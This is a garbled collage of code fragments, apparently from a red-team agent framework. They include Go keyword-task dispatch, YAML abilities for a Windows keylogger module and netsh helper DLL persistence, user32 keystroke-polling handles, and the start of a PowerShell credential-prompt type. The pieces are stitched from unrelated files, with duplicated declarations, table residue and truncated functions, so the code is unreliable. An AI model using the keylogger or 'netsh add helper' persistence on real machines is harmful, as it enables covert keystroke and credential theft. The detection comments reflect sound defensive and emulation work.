package commands | |
import ( | |
"encoding/json" | |
"log" | |
"os" | |
"syscall" | |
"unsafe" | |
) |
//+build !windows | |
package commands | |
// CallNativeAPI is the stub compiled into non-Windows builds (the file is
// guarded by the !windows build constraint). It ignores task and always
// returns the same message together with the integers 1 and -1; what the
// two integers mean to the caller is not shown in this excerpt.
func CallNativeAPI(task string) (string, int, int) {
	const notImplemented = "Not implemented for non-Windows platforms"
	return notImplemented, 1, -1
}
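// Keyword tasks are dispatched inside the agent. The message is split on '.'
// and the first field selects the handler, the second is its argument.
if executor == "keyword" {
	task := splitMessage(message, '.')
	// splitMessage is defined elsewhere; if it can return fewer than two
	// fields (for example a message with no '.'), indexing task[1] would
	// panic. Treat such a message like any other unsupported keyword.
	if len(task) < 2 {
		return "Keyword selected not available for agent", 0, 0
	}
	switch task[0] {
	case "api":
		return CallNativeAPI(task[1])
	case "config":
		return updateConfiguration(task[1], agent)
	}
	return "Keyword selected not available for agent", 0, 0
}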
if executor == "keyword" { | |
task := splitMessage(message, '.') | |
if task[0] == "module" { | |
var err error | |
if !contains(util.InstalledModuleKeywords, task[1] + "." + task[2]) { | |
err = util.InstallModule(task[1], payloadPath) | |
} | |
if err != nil { | |
return err.Error(), 1, -1 | |
} |
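# Windows entry that uses the "keyword" executor: the command is interpreted
# by the agent itself, and the payload is the module binary it refers to.
# Keystroke capture corresponds to MITRE ATT&CK T1056.001 (Input Capture:
# Keylogging); run it only inside an authorised exercise scope.
platforms:
  windows:
    keyword:
      # "module.<module>.<function>" as parsed by the agent's keyword handler.
      command: module.collect.keyLogger
      payload: "#{operator.payloads}/pneumaEX/collect/collect-windows.exe"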
// user32 is a lazy handle to user32.dll: NewLazyDLL does not load the library
// until one of its procedures is first used.
// NOTE(review): syscall.NewLazyDLL is given a bare file name here, so the
// normal DLL search order applies; confirm that is acceptable for this build.
var user32 = syscall.NewLazyDLL("user32.dll")

// Procedures resolved from user32.dll. The code that calls them is not part
// of this excerpt. For reviewers and detection engineers: key-state polling
// combined with virtual-key-to-Unicode translation in a process without a UI
// is a common indicator of keystroke capture.
var (
	getAsyncKeyState  = user32.NewProc("GetAsyncKeyState")
	getKeyboardLayout = user32.NewProc("GetKeyboardLayout")
	getKeyState       = user32.NewProc("GetKeyState")
	toUnicodeEx       = user32.NewProc("ToUnicodeEx")
)
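# Registers the payload DLL as a netsh helper. netsh loads its registered
# helper DLLs whenever it starts, which is why this is catalogued as a
# persistence technique (MITRE ATT&CK T1546.007, Netsh Helper DLL).
# Detection: helper registrations are stored under
# HKLM\SOFTWARE\Microsoft\NetSh; monitor that key for new values and alert on
# "netsh add helper" command lines that reference a DLL outside System32.
# Cleanup after an exercise: "netsh delete helper <dll>" removes the entry.
platforms:
  windows:
    # The same command is provided for both the exec and cmd executors.
    exec:
      command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll'
      payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll'
    cmd:
      command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll'
      payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll'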
#include <locale> | |
#include <cstdlib> | |
#include <stdio.h> | |
#include <string> | |
#include <Windows.h> | |
#include "Syscalls.h" | |
LONG GetStringRegKey(HKEY, const std::wstring&, std::wstring&, const std::wstring&); | |
DWORD WINAPI RunBin(LPVOID lpParameter) { |
$type=@" | |
using System; | |
using System.Text; | |
using System.Runtime.InteropServices; | |
public static class CredUI | |
{ | |
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] | |
private struct CREDUI_INFO |
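// Assuming this line is Go, like the module code on this page: backslashes in
// an interpreted ("...") string literal must be escaped, otherwise \F, \P and
// the others are rejected as unknown escape sequences. The path is a
// placeholder for the output file.
RunStandalone("GoCapture", "C:\\File\\Path\\To\\Capture\\into.tmp")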